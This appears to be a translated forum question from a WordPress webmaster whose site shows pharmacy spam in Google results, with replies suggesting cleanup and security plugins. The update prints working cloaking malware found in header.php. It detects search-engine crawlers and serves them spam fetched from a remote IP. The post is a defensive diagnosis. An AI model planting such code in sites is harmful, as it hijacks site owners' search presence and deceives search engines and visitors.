1
我是www.cuscalgary.ca的網站管理員。如果您在谷歌搜索「cus calgary」,那麼我的網站上有幾個鏈接似乎在鏈接描述(如下面的屏幕截圖)中顯示有奇怪的,看似荷蘭的字符串,例如「köpaviagra snabb leverans」。此外,我正在通過我的網站在Google上的主要鏈接下收到不負責任的「本網站可能遭到黑客入侵」的消息。 
Wordpress網站根據Google遭到入侵 - 它是真的嗎?
到目前爲止,我已經嘗試通過Google Chrome瀏覽器和CTRL + F檢查頁面的代碼,以查找搜索結果中顯示的單詞(例如,試圖在聯繫我們中找到「Paul Junker」頁),我已經嘗試下載主題文件夾,並通過記事本++進行「通過文件夾搜索」功能來查找任何這些奇怪的字符串。我甚至嘗試通過Wordpress儀表板來查找任何這些字符串。唉,我沒有發現這些奇怪的字符串的跡象。
我開始認爲Google可能暫時沒有抓取我的網站,並且這些字符串已經以某種方式被刪除。雖然,我懷疑是這樣。
有沒有人有類似的經歷,他們找到了解決方案?如果是這樣,我會非常感激聽到你是如何處理這種麻煩的。
非常感謝您的幫助 - 所有幫助表示感謝。
凱爾西
UPDATE:
我可能已經找到header.php文件的罪魁禍首。請查看我在以下文件開頭找到的代碼:
<?php
$user_agent_to_filter = array('#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
'#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
'#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
'#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
'#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*note#i', '#FAST\s*MetaWeb\s*Crawler#i',
'#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
'#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
'#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
'#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
'#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
'#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
'#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
'#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
'#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
'#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
'#charlotte#i', '#ngb#i', '#BingBot#i') ;
if (!empty($_SERVER['HTTP_USER_AGENT']) && (FALSE !== strpos(preg_replace($user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT']), '-NO-WAY-'))){
$isbot = 1;
}
if(FALSE !== strpos(gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
{
$isbot = 1;
}
if(@$isbot){
$_SERVER[HTTP_USER_AGENT] = str_replace(" ", "-", $_SERVER[HTTP_USER_AGENT]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://173.236.65.24/cakes/?useragent=$_SERVER[HTTP_USER_AGENT]&domain=$_SERVER[HTTP_HOST]");
$result = curl_exec($ch);
curl_close ($ch);
echo $result;
}
?><!DOCTYPE html>
我沒有在您的網站的HTML中看到任何這些字符串。我建議您等待幾天,看看Google是否更新搜索結果。至於黑客的事情,如果你公司的其他人可以訪問這個網站,考慮詢問他們是否改變了任何事情。 – Nadav
這樣做。 – Joe
刪除它仍然只是其中的一部分。您需要實施解決方案以降低再次發生的風險。如果您在共享服務器上,則更加困難,因爲有目錄遍歷工具允許其他人通過將服務器上載到另一個帳戶並獲得shell訪問權限從服務器的其他位置訪問您的站點。但是WP有一些很好的安全工具。絕對檢查Wordfence(有免費和付費版本),並進行定期備份。 – Joe